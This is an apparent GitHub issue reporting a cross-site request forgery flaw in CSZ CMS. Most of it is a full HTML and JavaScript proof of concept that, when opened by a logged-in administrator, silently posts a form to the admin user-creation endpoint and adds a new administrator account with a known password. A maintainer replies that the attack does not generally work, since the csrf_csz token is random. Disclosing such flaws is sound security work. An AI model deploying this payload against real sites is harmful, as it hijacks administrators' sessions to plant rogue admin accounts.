There is one CSRF vulnerability that can add the administrator account
RitaWWang opened this issue · comments
RitaWWang commented
After the administrator logged in, open the following page
poc:
one.html---add a administrator
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/cszcms-master\/admin\/users\/new\/add", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykobVwTQR7Qxut2B0");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"csrf_csz\"\r\n" +
"\r\n" +
"f34972c37ae66af1cf3355b95a25e347\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"name\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"test3@test3.com\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"con_password\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"group\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"active\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"te\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"st\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"year\"\r\n" +
"\r\n" +
"1929\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"month\"\r\n" +
"\r\n" +
"02\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"day\"\r\n" +
"\r\n" +
"02\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"gender\"\r\n" +
"\r\n" +
"male\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"address\"\r\n" +
"\r\n" +
"123\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"15826597895\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"file_upload\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>```
Cskaza Bassist commented
It not working for all. Because you don't know csrf_csz key on next submit. It's random.